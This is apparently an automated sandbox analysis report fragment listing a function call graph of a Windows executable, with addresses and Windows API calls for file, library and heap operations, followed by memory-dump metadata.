38890->38886 38890->38889 38892 7ff702c62d8b QueryPerformanceCounter 38891->38892 38893 7ff702c19cd7 38891->38893 38892->38893 38893->38842 38895 7ff702c49dbc 38894->38895 38895->38895 38896 7ff702c5a610 _handle_error 8 API calls 38895->38896 38897 7ff702c49f40 38896->38897 38897->38883 38905 7ff702c48094 38898->38905 38901 7ff702c28a44 38902 7ff702c28a5a memcpy_s 38901->38902 38937 7ff702c4bac4 38902->38937 38906 7ff702c4809f 38905->38906 38906->38906 38909 7ff702c47ec8 38906->38909 38910 7ff702c47efa __BuildCatchObjectHelper 38909->38910 38915 7ff702c47fb5 38910->38915 38923 7ff702c4b3f0 38910->38923 38913 7ff702c4805c GetCurrentProcessId 38916 7ff702c2896e 38913->38916 38914 7ff702c47f7e GetProcAddressForCaller GetProcAddress 38914->38915 38915->38913 38917 7ff702c47ff1 38915->38917 38916->38901 38917->38916 38932 7ff702c1ca6c 48 API calls 3 library calls 38917->38932 38919 7ff702c4801f 38933 7ff702c1cda4 10 API calls 2 library calls 38919->38933 38921 7ff702c48027 38934 7ff702c1ca40 61 API calls _CxxThrowException 38921->38934 38935 7ff702c5a5a0 38923->38935 38926 7ff702c4b42c 38928 7ff702c348bc 8 API calls 38926->38928 38927 7ff702c4b428 38930 7ff702c5a610 _handle_error 8 API calls 38927->38930 38929 7ff702c4b444 LoadLibraryExW 38928->38929 38929->38927 38931 7ff702c47f72 38930->38931 38931->38914 38931->38915 38932->38919 38933->38921 38934->38916 38936 7ff702c4b3fc GetSystemDirectoryW 38935->38936 38936->38926 38936->38927 38940 7ff702c4ba70 GetCurrentProcess GetProcessAffinityMask 38937->38940 38939 7ff702c289c5 38939->38590 38941 7ff702c4ba96 38940->38941 38941->38939 38941->38941 38944 7ff702c39245 38942->38944 38950 7ff702c26194 72 API calls 38944->38950 38945 7ff702c392b1 38951 7ff702c26194 72 API calls 38945->38951 38947 7ff702c392bd 38952 7ff702c26194 72 API calls 38947->38952 38949 7ff702c392c9 38950->38945 38951->38947 38952->38949 38953->38601 38954->38604 38955->38607 38956->38609 38957->38599 38958->38602 38959->38600 38960->38615 38961 7ff702c03b53 38962 7ff702c03b64 38961->38962 39012 7ff702c21e80 38962->39012 38963 7ff702c03c09 39024 7ff702c223f0 38963->39024 38964 7ff702c03bb6 38964->38963 38966 7ff702c03c18 38964->38966 38967 7ff702c03c01 38964->38967 39034 7ff702c08050 157 API calls 38966->39034 39029 7ff702c21c24 38967->39029 38970 7ff702c03c3d 39035 7ff702c08010 13 API calls 38970->39035 38971 7ff702c03ccc 38973 7ff702c03c90 38971->38973 39042 7ff702c22414 61 API calls 38971->39042 39051 7ff702c4d400 48 API calls 38973->39051 38975 7ff702c03c45 38978 7ff702c03c54 38975->38978 39036 7ff702c1cba8 75 API calls 38975->39036 38977 7ff702c03cf9 39043 7ff702c21998 138 API calls 38977->39043 39037 7ff702c0a9d4 186 API calls wcschr 38978->39037 38982 7ff702c03c5c 39038 7ff702c093ac 8 API calls 38982->39038 38983 7ff702c03d10 39044 7ff702c218ac 38983->39044 38986 7ff702c03c66 38988 7ff702c03c77 38986->38988 39039 7ff702c1ca40 61 API calls _CxxThrowException 38986->39039 39040 7ff702c08090 8 API calls 38988->39040 38991 7ff702c03c7f 38991->38973 39041 7ff702c1ca40 61 API calls _CxxThrowException 38991->39041 39013 7ff702c21e95 setbuf 39012->39013 39014 7ff702c21ecb CreateFileW 39013->39014 39015 7ff702c21f59 GetLastError 39014->39015 39016 7ff702c21fb8 39014->39016 39017 7ff702c34534 10 API calls 39015->39017 39018 7ff702c21fd9 SetFileTime 39016->39018 39019 7ff702c21ff7 39016->39019 39020 7ff702c21f74 39017->39020 39018->39019 39021 7ff702c5a610 _handle_error 8 API calls 39019->39021 39020->39016 39022 7ff702c21f78 CreateFileW GetLastError 39020->39022 39023 7ff702c2203a 39021->39023 39022->39016 39023->38964 39052 7ff702c224e8 39024->39052 39027 7ff702c2240e 39027->38971 39030 7ff702c21c37 39029->39030 39031 7ff702c21c3b 39029->39031 39030->38963 39031->39030 39032 7ff702c21c5d 39031->39032 39069 7ff702c22d6c 12 API calls 2 library calls 39032->39069 39034->38970 39035->38975 39037->38982 39038->38986 39039->38988 39040->38991 39041->38973 39042->38977 39043->38983 39045 7ff702c218ca 39044->39045 39050 7ff702c218db 39044->39050 39046 7ff702c218de 39045->39046 39047 7ff702c218d6 39045->39047 39045->39050 39070 7ff702c21930 39046->39070 39048 7ff702c21c24 12 API calls 39047->39048 39048->39050 39050->38973 39058 7ff702c21af0 39052->39058 39055 7ff702c223f9 39055->39027 39057 7ff702c1ca40 61 API calls _CxxThrowException 39055->39057 39057->39027 39059 7ff702c21b01 setbuf 39058->39059 39060 7ff702c21b6f CreateFileW 39059->39060 39061 7ff702c21b68 39059->39061 39060->39061 39062 7ff702c34534 10 API calls 39061->39062 39063 7ff702c21be1 39061->39063 39064 7ff702c21bb3 39062->39064 39066 7ff702c5a610 _handle_error 8 API calls 39063->39066 39064->39063 39065 7ff702c21bb7 CreateFileW 39064->39065 39065->39063 39067 7ff702c21c14 39066->39067 39067->39055 39068 7ff702c1ca08 10 API calls 39067->39068 39068->39055 39069->39030 39071 7ff702c21964 39070->39071 39072 7ff702c2194c 39070->39072 39073 7ff702c21988 39071->39073 39076 7ff702c1c9d0 10 API calls 39071->39076 39072->39071 39074 7ff702c21958 CloseHandle 39072->39074 39073->39050 39074->39071 39076->39073 39077 7ff702c03e71 39078 7ff702c03e81 39077->39078 39081 7ff702c03e89 39077->39081 39078->39081 39088 7ff702c59a14 49 API calls 39078->39088 39080 7ff702c03edd 39083 7ff702c5a610 _handle_error 8 API calls 39080->39083 39081->39080 39082 7ff702c03ea3 39081->39082 39089 7ff702c2331c 48 API calls 2 library calls 39082->39089 39085 7ff702c03eef 39083->39085 39086 7ff702c03eab 39086->39080 39090 7ff702c063e8 8 API calls 2 library calls 39086->39090 39088->39081 39089->39086 39090->39080 39091 7ff702c4a924 39093 7ff702c4a949 snprintf 39091->39093 39092 7ff702c4a97f CompareStringA 39093->39092 39094 7ff702c082f0 39095 7ff702c08306 39094->39095 39107 7ff702c0836f 39094->39107 39096 7ff702c08324 39095->39096 39099 7ff702c08371 39095->39099 39095->39107 39214 7ff702c22414 61 API calls 39096->39214 39098 7ff702c08347 39215 7ff702c21998 138 API calls 39098->39215 39099->39107 39216 7ff702c21998 138 API calls 39099->39216 39102 7ff702c0835e 39103 7ff702c218ac 15 API calls 39102->39103 39103->39107 39117 7ff702c0a410 39107->39117 39108 7ff702c08578 39109 7ff702c0b540 147 API calls 39108->39109 39114 7ff702c0858f 39109->39114 39110 7ff702c0b540 147 API calls 39110->39108 39111 7ff702c08634 39112 7ff702c5a610 _handle_error 8 API calls 39111->39112 39113 7ff702c08663 39112->39113 39114->39111 39217 7ff702c09628 175 API calls 39114->39217 39218 7ff702c37a68 39117->39218 39120 7ff702c0853a 39122 7ff702c0b540 39120->39122 39126 7ff702c0b55f setbuf 39122->39126 39123 7ff702c0b5a1 39124 7ff702c0b5d8 39123->39124 39125 7ff702c0b5b8 39123->39125 39366 7ff702c38c1c 39124->39366 39252 7ff702c0aba0 39125->39252 39126->39123 39248 7ff702c0a4d0 39126->39248 39129 7ff702c5a610 _handle_error 8 API calls 39131 7ff702c0854f 39129->39131 39130 7ff702c0b67f 39132 7ff702c0bc91 39130->39132 39133 7ff702c0bbae 39130->39133 39134 7ff702c0b6a5 39130->39134 39131->39108 39131->39110 39135 7ff702c22574 126 API calls 39132->39135 39212 7ff702c0b5d3 39132->39212 39136 7ff702c38d00 48 API calls 39133->39136 39147 7ff702c0b6b5 39134->39147 39163 7ff702c0b79f 39134->39163 39134->39212 39135->39212 39138 7ff702c0bc5c 39136->39138 39435 7ff702c38d38 48 API calls 39138->39435 39142 7ff702c0bc69 39436 7ff702c38d38 48 API calls 39142->39436 39145 7ff702c0bc76 39437 7ff702c38d38 48 API calls 39145->39437 39147->39212 39400 7ff702c38d00 39147->39400 39148 7ff702c0bc84 39438 7ff702c38d88 48 API calls 39148->39438 39153 7ff702c0b726 39404 7ff702c38d38 48 API calls 39153->39404 39155 7ff702c0b733 39156 7ff702c0b749 39155->39156 39405 7ff702c38d88 48 API calls 39155->39405 39158 7ff702c0b75c 39156->39158 39406 7ff702c38d38 48 API calls 39156->39406 39160 7ff702c0b779 39158->39160 39162 7ff702c38d00 48 API calls 39158->39162 39407 7ff702c38f94 39160->39407 39162->39158 39164 7ff702c0b8e5 39163->39164 39417 7ff702c0c3c8 CharLowerW CharUpperW 39163->39417 39418 7ff702c4d840 WideCharToMultiByte 39164->39418 39168 7ff702c0b9a1 39169 7ff702c38d00 48 API calls 39168->39169 39171 7ff702c0b9c4 39169->39171 39421 7ff702c38d38 48 API calls 39171->39421 39173 7ff702c0b910 39173->39168 39420 7ff702c0945c 55 API calls _handle_error 39173->39420 39174 7ff702c0b9d1 39422 7ff702c38d38 48 API calls 39174->39422 39176 7ff702c0b9de 39423 7ff702c38d88 48 API calls 39176->39423 39178 7ff702c0b9eb 39424 7ff702c38d88 48 API calls 39178->39424 39180 7ff702c0ba0b 39181 7ff702c38d00 48 API calls 39180->39181 39182 7ff702c0ba27 39181->39182 39425 7ff702c38d88 48 API calls 39182->39425 39184 7ff702c0ba37 39185 7ff702c0ba49 39184->39185 39426 7ff702c4bc48 15 API calls 39184->39426 39427 7ff702c38d88 48 API calls 39185->39427 39188 7ff702c0ba59 39189 7ff702c38d00 48 API calls 39188->39189 39190 7ff702c0ba66 39189->39190 39191 7ff702c38d00 48 API calls 39190->39191 39192 7ff702c0ba78 39191->39192 39428 7ff702c38d38 48 API calls 39192->39428 39194 7ff702c0ba85 39429 7ff702c38d88 48 API calls 39194->39429 39196 7ff702c0ba92 39197 7ff702c0bacd 39196->39197 39430 7ff702c38d88 48 API calls 39196->39430 39432 7ff702c38e3c 39197->39432 39199 7ff702c0bab2 39431 7ff702c38d88 48 API calls 39199->39431 39202 7ff702c0bb33 39204 7ff702c0bb53 39202->39204 39207 7ff702c38e3c 48 API calls 39202->39207 39208 7ff702c0bb6e 39204->39208 39210 7ff702c38e3c 48 API calls 39204->39210 39205 7ff702c38d00 48 API calls 39209 7ff702c0bb09 39205->39209 39206 7ff702c38e3c 48 API calls 39206->39202 39207->39204 39211 7ff702c38f94 126 API calls 39208->39211 39209->39202 39209->39206 39210->39208 39211->39212 39212->39129 39214->39098 39215->39102 39216->39107 39217->39111 39219 7ff702c0a434 39218->39219 39221 7ff702c37a8d 39218->39221 39219->39120 39226 7ff702c222e0 39219->39226 39220 7ff702c37aaf 39220->39219 39222 7ff702c222e0 12 API calls 39220->39222 39221->39220 39231 7ff702c37340 157 API calls 39221->39231 39224 7ff702c37adf 39222->39224 39232 7ff702c22440 39224->39232 39242 7ff702c220b4 39226->39242 39229 7ff702c22307 39229->39120 39231->39220 39233 7ff702c2246a SetFilePointer 39232->39233 39234 7ff702c22454 39232->39234 39235 7ff702c2248d GetLastError 39233->39235 39238 7ff702c224ad 39233->39238 39234->39238 39240 7ff702c1cd00 10 API calls 39234->39240 39237 7ff702c22497 39235->39237 39235->39238 39237->39238 39241 7ff702c1cd00 10 API calls 39237->39241 39238->39219 39245 7ff702c22130 39242->39245 39246 7ff702c220d0 39242->39246 39243 7ff702c22102 SetFilePointer 39244 7ff702c22126 GetLastError 39243->39244 39243->39245 39244->39245 39245->39229 39247 7ff702c1cd00 10 API calls 39245->39247 39246->39243 39249 7ff702c0a4ea 39248->39249 39250 7ff702c0a4ee 39249->39250 39251 7ff702c22440 12 API calls 39249->39251 39250->39123 39251->39250 39253 7ff702c0abbf setbuf 39252->39253 39254 7ff702c38c1c 48 API calls 39253->39254 39257 7ff702c0abf5 39254->39257 39255 7ff702c0b4af 39258 7ff702c0b4ff 39255->39258 39262 7ff702c22574 126 API calls 39255->39262 39256 7ff702c0acbf 39259 7ff702c0acc8 39256->39259 39260 7ff702c0b35c 39256->39260 39257->39255 39261 7ff702c19be0 14 API calls 39257->39261 39288 7ff702c0aca7 39257->39288 39263 7ff702c372c0 4 API calls 39258->39263 39265 7ff702c0acdd 39259->39265 39272 7ff702c0ad60 39259->39272 39308 7ff702c0aea7 39259->39308 39264 7ff702c38eec 48 API calls 39260->39264 39266 7ff702c0ac34 39261->39266 39262->39258 39263->39272 39267 7ff702c0b395 39264->39267 39268 7ff702c0ad68 39265->39268 39269 7ff702c0ace6 39265->39269 39270 7ff702c190b8 75 API calls 39266->39270 39271 7ff702c0b3ad 39267->39271 39457 7ff702c09e2c 48 API calls 39267->39457 39274 7ff702c38eec 48 API calls 39268->39274 39269->39272 39439 7ff702c38eec 39269->39439 39273 7ff702c0ac8f 39270->39273 39277 7ff702c38eec 48 API calls 39271->39277 39276 7ff702c5a610 _handle_error 8 API calls 39272->39276 39283 7ff702c22574 126 API calls 39273->39283 39273->39288 39280 7ff702c0ad9c 39274->39280 39281 7ff702c0b52b 39276->39281 39278 7ff702c0b3d4 39277->39278 39285 7ff702c38eec 48 API calls 39278->39285 39286 7ff702c0b3e6 39278->39286 39284 7ff702c38eec 48 API calls 39280->39284 39281->39212 39283->39288 39289 7ff702c0ada9 39284->39289 39285->39286 39291 7ff702c38eec 48 API calls 39286->39291 39287 7ff702c38eec 48 API calls 39292 7ff702c0ad31 39287->39292 39288->39255 39288->39256 39290 7ff702c38eec 48 API calls 39289->39290 39293 7ff702c0adb5 39290->39293 39294 7ff702c0b451 39291->39294 39295 7ff702c38eec 48 API calls 39292->39295 39296 7ff702c38eec 48 API calls 39293->39296 39297 7ff702c0b471 39294->39297 39303 7ff702c38eec 48 API calls 39294->39303 39298 7ff702c0ad46 39295->39298 39299 7ff702c0adc2 39296->39299 39301 7ff702c0b486 39297->39301 39304 7ff702c38e3c 48 API calls 39297->39304 39300 7ff702c38f94 126 API calls 39298->39300 39302 7ff702c38d00 48 API calls 39299->39302 39300->39272 39305 7ff702c38f94 126 API calls 39301->39305 39306 7ff702c0adcf 39302->39306 39303->39297 39304->39301 39305->39272 39309 7ff702c190b8 75 API calls 39306->39309 39307 7ff702c0afda 39316 7ff702c0aff2 39307->39316 39448 7ff702c09d98 48 API calls 39307->39448 39308->39307 39447 7ff702c09b64 48 API calls _handle_error 39308->39447 39312 7ff702c0ae22 39309->39312 39313 7ff702c38e3c 48 API calls 39312->39313 39314 7ff702c0ae33 39313->39314 39315 7ff702c38e3c 48 API calls 39314->39315 39319 7ff702c0ae48 39315->39319 39317 7ff702c0b02b 39316->39317 39449 7ff702c09efc 48 API calls _handle_error 39316->39449 39318 7ff702c0b0af 39317->39318 39450 7ff702c0a2c8 48 API calls 39317->39450 39322 7ff702c0b0c8 39318->39322 39451 7ff702c0a1a0 48 API calls 2 library calls 39318->39451 39326 7ff702c49ce4 8 API calls 39319->39326 39324 7ff702c0b0e2 39322->39324 39452 7ff702c0a350 48 API calls _handle_error 39322->39452 39327 7ff702c38eec 48 API calls 39324->39327 39328 7ff702c0ae60 39326->39328 39330 7ff702c0b0fc 39327->39330 39329 7ff702c49b70 8 API calls 39328->39329 39331 7ff702c0ae6d 39329->39331 39332 7ff702c38eec 48 API calls 39330->39332 39333 7ff702c38e3c 48 API calls 39331->39333 39334 7ff702c0b109 39332->39334 39335 7ff702c0ae80 39333->39335 39336 7ff702c0b11f 39334->39336 39338 7ff702c38eec 48 API calls 39334->39338 39337 7ff702c38f94 126 API calls 39335->39337 39443 7ff702c38e94 39336->39443 39337->39272 39338->39336 39341 7ff702c38eec 48 API calls 39342 7ff702c0b147 39341->39342 39343 7ff702c38e94 48 API calls 39342->39343 39344 7ff702c0b15f 39343->39344 39345 7ff702c38eec 48 API calls 39344->39345 39348 7ff702c0b16c 39345->39348 39346 7ff702c0b18a 39347 7ff702c0b1a9 39346->39347 39454 7ff702c38d88 48 API calls 39346->39454 39350 7ff702c38e94 48 API calls 39347->39350 39348->39346 39453 7ff702c38d88 48 API calls 39348->39453 39352 7ff702c0b1bc 39350->39352 39353 7ff702c38eec 48 API calls 39352->39353 39354 7ff702c0b1d6 39353->39354 39356 7ff702c0b1e9 39354->39356 39455 7ff702c0c3c8 CharLowerW CharUpperW 39354->39455 39356->39356 39357 7ff702c38eec 48 API calls 39356->39357 39358 7ff702c0b21f 39357->39358 39359 7ff702c38e3c 48 API calls 39358->39359 39360 7ff702c0b230 39359->39360 39361 7ff702c0b247 39360->39361 39362 7ff702c38e3c 48 API calls 39360->39362 39363 7ff702c38f94 126 API calls 39361->39363 39362->39361 39364 7ff702c0b278 39363->39364 39364->39272 39456 7ff702c370d8 4 API calls 2 library calls 39364->39456 39458 7ff702c38f28 39366->39458 39369 7ff702c190b8 39370 7ff702c191a9 39369->39370 39371 7ff702c19123 39369->39371 39372 7ff702c5a610 _handle_error 8 API calls 39370->39372 39371->39370 39476 7ff702c47e74 39371->39476 39374 7ff702c0b66e 39372->39374 39385 7ff702c22574 39374->39385 39376 7ff702c4d840 WideCharToMultiByte 39377 7ff702c19157 39376->39377 39377->39370 39378 7ff702c1916a 39377->39378 39379 7ff702c191c4 39377->39379 39380 7ff702c191ab 39378->39380 39381 7ff702c1916f 39378->39381 39495 7ff702c19338 12 API calls _handle_error 39379->39495 39494 7ff702c1951c 71 API calls _handle_error 39380->39494 39381->39370 39480 7ff702c198b0 39381->39480 39386 7ff702c2259e 39385->39386 39387 7ff702c225a5 39385->39387 39386->39130 39388 7ff702c225ab GetStdHandle 39387->39388 39395 7ff702c225ba 39387->39395 39388->39395 39389 7ff702c22619 WriteFile 39389->39395 39390 7ff702c225cf WriteFile 39391 7ff702c2260b 39390->39391 39390->39395 39391->39390 39391->39395 39392 7ff702c22658 GetLastError 39392->39395 39394 7ff702c22684 SetLastError 39394->39395 39395->39386 39395->39389 39395->39390 39395->39392 39398 7ff702c22721 39395->39398 39560 7ff702c23144 9 API calls 2 library calls 39395->39560 39561 7ff702c1cf34 10 API calls 39395->39561 39562 7ff702c1c95c 126 API calls 39395->39562 39563 7ff702c1cf14 10 API calls 39398->39563 39401 7ff702c0161c 48 API calls 39400->39401 39402 7ff702c0b719 39401->39402 39403 7ff702c38d38 48 API calls 39402->39403 39403->39153 39404->39155 39405->39156 39406->39158 39408 7ff702c39131 39407->39408 39411 7ff702c38fcf 39407->39411 39408->39212 39409 7ff702c390e0 39409->39408 39412 7ff702c22574 126 API calls 39409->39412 39410 7ff702c3905d 39410->39409 39413 7ff702c0161c 48 API calls 39410->39413 39411->39410 39564 7ff702c1ca6c 48 API calls 3 library calls 39411->39564 39412->39408 39413->39409 39415 7ff702c3904c 39565 7ff702c1ca40 61 API calls _CxxThrowException 39415->39565 39417->39164 39419 7ff702c0b8f8 CharToOemA 39418->39419 39419->39173 39420->39168 39421->39174 39422->39176 39423->39178 39424->39180 39425->39184 39426->39185 39427->39188 39428->39194 39429->39196 39430->39199 39431->39197 39433 7ff702c0161c 48 API calls 39432->39433 39434 7ff702c0baf2 39433->39434 39434->39202 39434->39205 39434->39209 39435->39142 39436->39145 39437->39148 39438->39132 39440 7ff702c38efc 39439->39440 39441 7ff702c38d00 48 API calls 39440->39441 39442 7ff702c0ad24 39440->39442 39441->39440 39442->39287 39445 7ff702c38eac 39443->39445 39444 7ff702c38d00 48 API calls 39444->39445 39445->39444 39446 7ff702c0b137 39445->39446 39446->39341 39447->39307 39448->39316 39449->39317 39450->39318 39451->39322 39452->39324 39453->39346 39454->39347 39455->39356 39456->39272 39457->39271 39461 7ff702c0161c 39458->39461 39460 7ff702c0b601 39460->39130 39460->39132 39460->39369 39463 7ff702c01640 39461->39463 39471 7ff702c016aa __BuildCatchObjectHelper 39461->39471 39462 7ff702c0166d 39467 7ff702c016d4 39462->39467 39468 7ff702c0168e 39462->39468 39463->39462 39472 7ff702c1ca6c 48 API calls 3 library calls 39463->39472 39465 7ff702c01661 39473 7ff702c1cb64 8 API calls 39465->39473 39467->39471 39475 7ff702c1cb64 8 API calls 39467->39475 39468->39471 39474 7ff702c1cb64 8 API calls 39468->39474 39471->39460 39472->39465 39477 7ff702c19143 39476->39477 39478 7ff702c47e95 39476->39478 39477->39376 39479 7ff702c47ec8 68 API calls 39478->39479 39479->39477 39484 7ff702c19920 39480->39484 39489 7ff702c19b45 39480->39489 39481 7ff702c5a610 _handle_error 8 API calls 39482 7ff702c19b61 39481->39482 39482->39370 39485 7ff702c1996d 39484->39485 39486 7ff702c19b75 39484->39486 39496 7ff702c47da8 39484->39496 39485->39485 39503 7ff702c1a0f4 39485->39503 39488 7ff702c47f24 68 API calls 39486->39488 39490 7ff702c19acb 39488->39490 39489->39481 39490->39489 39533 7ff702c44ea8 8 API calls _handle_error 39490->39533 39491 7ff702c199d0 39519 7ff702c47f24 39491->39519 39494->39370 39495->39370 39497 7ff702c47e74 68 API calls 39496->39497 39498 7ff702c47ddc 39497->39498 39499 7ff702c47e74 68 API calls 39498->39499 39500 7ff702c47def 39499->39500 39501 7ff702c5a610 _handle_error 8 API calls 39500->39501 39502 7ff702c47e43 39501->39502 39502->39484 39506 7ff702c1a15c __BuildCatchObjectHelper 39503->39506 39504 7ff702c1a358 39556 7ff702c5a774 8 API calls __report_securityfailure 39504->39556 39506->39504 39509 7ff702c1a34d 39506->39509 39510 7ff702c1a192 39506->39510 39513 7ff702c1a352 39506->39513 39508 7ff702c1a35e 39554 7ff702c5a774 8 API calls __report_securityfailure 39509->39554 39534 7ff702c19dd8 39510->39534 39555 7ff702c5a774 8 API calls __report_securityfailure 39513->39555 39514 7ff702c1a1d9 39515 7ff702c19dd8 8 API calls 39514->39515 39516 7ff702c1a2f1 39514->39516 39515->39514 39517 7ff702c5a610 _handle_error 8 API calls 39516->39517 39518 7ff702c1a33b 39517->39518 39518->39491 39520 7ff702c47f5e 39519->39520 39521 7ff702c47fb5 39519->39521 39520->39521 39522 7ff702c4b3f0 10 API calls 39520->39522 39524 7ff702c4805c GetCurrentProcessId 39521->39524 39525 7ff702c47ff1 39521->39525 39523 7ff702c47f72 39522->39523 39523->39521 39526 7ff702c47f7e GetProcAddressForCaller GetProcAddress 39523->39526 39527 7ff702c48034 39524->39527 39525->39527 39557 7ff702c1ca6c 48 API calls 3 library calls 39525->39557 39526->39521 39527->39490 39529 7ff702c4801f 39558 7ff702c1cda4 10 API calls 2 library calls 39529->39558 39531 7ff702c48027 39559 7ff702c1ca40 61 API calls _CxxThrowException 39531->39559 39533->39489 39535 7ff702c19e46 39534->39535 39539 7ff702c19e6e memcpy_s 39534->39539 39536 7ff702c49ce4 8 API calls 39535->39536 39537 7ff702c19e5e 39536->39537 39540 7ff702c49b70 8 API calls 39537->39540 39538 7ff702c49ce4 8 API calls 39542 7ff702c19f97 39538->39542 39541 7ff702c19e85 39539->39541 39543 7ff702c49ce4 8 API calls 39539->39543 39540->39539 39541->39538 39544 7ff702c49b70 8 API calls 39542->39544 39543->39541 39547 7ff702c19fa8 memcpy_s 39544->39547 39545 7ff702c19fb4 39546 7ff702c49ce4 8 API calls 39545->39546 39549 7ff702c1a0bb 39546->39549 39547->39545 39548 7ff702c49ce4 8 API calls 39547->39548 39548->39545 39550 7ff702c49b70 8 API calls 39549->39550 39551 7ff702c1a0c9 39550->39551 39552 7ff702c5a610 _handle_error 8 API calls 39551->39552 39553 7ff702c1a0d8 39552->39553 39553->39514 39554->39513 39555->39504 39556->39508 39557->39529 39558->39531 39559->39527 39560->39394 39562->39395 39564->39415 39565->39410 39566 7ff702c07a5b 39567 7ff702c07a60 39566->39567 39568 7ff702c19be0 14 API calls 39567->39568 39569 7ff702c07af7 39567->39569 39568->39569 39570 7ff702c07bda 39569->39570 39599 7ff702c21e1c GetFileTime 39569->39599 39572 7ff702c0b540 147 API calls 39570->39572 39573 7ff702c07bf8 39572->39573 39576 7ff702c07c3e 39573->39576 39600 7ff702c59b98 216 API calls 3 library calls 39573->39600 39575 7ff702c0b540 147 API calls 39578 7ff702c07c9c 39575->39578 39576->39575 39577 7ff702c07f89 39578->39577 39601 7ff702c26378 39578->39601 39580 7ff702c07cd7 39581 7ff702c26378 4 API calls 39580->39581 39583 7ff702c07cf3 39581->39583 39582 7ff702c07de1 39589 7ff702c07e4e 39582->39589 39606 7ff702c398dc 39582->39606 39583->39582 39585 7ff702c07d59 39583->39585 39586 7ff702c07d38 39583->39586 39587 7ff702c5a444 new 4 API calls 39585->39587 39588 7ff702c5a444 new 4 API calls 39586->39588 39594 7ff702c07d42 std::bad_alloc::bad_alloc 39587->39594 39588->39594 39612 7ff702c01204 48 API calls 39589->39612 39591 7ff702c07eb3 39593 7ff702c07edb 39591->39593 39613 7ff702c39680 39591->39613 39619 7ff702c26424 8 API calls _handle_error 39593->39619 39594->39582 39605 7ff702c5ba34 RtlPcToFileHeader RaiseException 39594->39605 39597 7ff702c07f56 39598 7ff702c0b540 147 API calls 39597->39598 39598->39577 39599->39570 39600->39576 39602 7ff702c26396 39601->39602 39604 7ff702c263a0 39601->39604 39603 7ff702c5a444 new 4 API calls 39602->39603 39603->39604 39604->39580 39605->39582 39607 7ff702c3993c 39606->39607 39608 7ff702c39926 39606->39608 39610 7ff702c190b8 75 API calls 39607->39610 39609 7ff702c190b8 75 API calls 39608->39609 39611 7ff702c39934 39609->39611 39610->39611 39611->39589 39612->39591 39617 7ff702c396a4 39613->39617 39614 7ff702c397d7 39615 7ff702c22574 126 API calls 39615->39617 39617->39614 39617->39615 39618 7ff702c59b98 216 API calls 39617->39618 39620 7ff702c26498 72 API calls new 39617->39620 39618->39617 39619->39597 39620->39617 39621 7ff702c69c74 39622 7ff702c69c7c 39621->39622 39623 7ff702c69cbb 39622->39623 39624 7ff702c69cac 39622->39624 39627 7ff702c69cc5 39623->39627 39643 7ff702c6ce08 32 API calls 2 library calls 39623->39643 39642 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39624->39642 39630 7ff702c64b8c 39627->39630 39629 7ff702c69cb1 memcpy_s 39631 7ff702c64bab 39630->39631 39632 7ff702c64ba1 39630->39632 39634 7ff702c64bb0 39631->39634 39640 7ff702c64bb7 __vcrt_getptd_noexit 39631->39640 39644 7ff702c64ab4 39632->39644 39651 7ff702c64a74 39634->39651 39635 7ff702c64ba9 39635->39629 39637 7ff702c64bf6 39657 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39637->39657 39639 7ff702c64be0 RtlReAllocateHeap 39639->39635 39639->39640 39640->39637 39640->39639 39641 7ff702c636c0 new 2 API calls 39640->39641 39641->39640 39642->39629 39643->39627 39645 7ff702c64ac3 __vcrt_getptd_noexit 39644->39645 39646 7ff702c64aff 39644->39646 39645->39646 39647 7ff702c64ae6 RtlAllocateHeap 39645->39647 39650 7ff702c636c0 new 2 API calls 39645->39650 39658 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39646->39658 39647->39645 39649 7ff702c64afd 39647->39649 39649->39635 39650->39645 39652 7ff702c64a79 RtlFreeHeap 39651->39652 39653 7ff702c64aa9 Concurrency::details::SchedulerProxy::DeleteThis 39651->39653 39652->39653 39654 7ff702c64a94 39652->39654 39653->39635 39659 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39654->39659 39656 7ff702c64a99 GetLastError 39656->39653 39657->39635 39658->39649 39659->39656 39660 7ff702c4bb70 39663 7ff702c4bb80 39660->39663 39672 7ff702c4bae8 39663->39672 39665 7ff702c4bb79 39666 7ff702c4bb97 39666->39665 39677 7ff702c11690 39666->39677 39668 7ff702c4bbc8 SetEvent 39669 7ff702c4bbd5 LeaveCriticalSection 39668->39669 39670 7ff702c4bae8 67 API calls 39669->39670 39670->39666 39681 7ff702c4b974 WaitForSingleObject 39672->39681 39675 7ff702c4bb16 EnterCriticalSection LeaveCriticalSection 39676 7ff702c4bb12 39675->39676 39676->39666 39678 7ff702c116c2 EnterCriticalSection 39677->39678 39680 7ff702c116a4 39677->39680 39678->39668 39678->39669 39680->39678 39689 7ff702c11180 39680->39689 39682 7ff702c4b9b7 39681->39682 39683 7ff702c4b986 GetLastError 39681->39683 39682->39675 39682->39676 39687 7ff702c1ca6c 48 API calls 3 library calls 39683->39687 39685 7ff702c4b9a6 39688 7ff702c1ca40 61 API calls _CxxThrowException 39685->39688 39687->39685 39688->39682 39690 7ff702c111ab 39689->39690 39697 7ff702c111b0 39689->39697 39699 7ff702c117c8 216 API calls 2 library calls 39690->39699 39691 7ff702c1166a 39691->39680 39693 7ff702c36d38 216 API calls 39693->39697 39694 7ff702c36fe8 216 API calls 39694->39697 39695 7ff702c11080 48 API calls 39695->39697 39696 7ff702c36e90 216 API calls 39696->39697 39697->39691 39697->39693 39697->39694 39697->39695 39697->39696 39700 7ff702c117c8 216 API calls 2 library calls 39697->39700 39699->39697 39700->39697

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF702C154C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
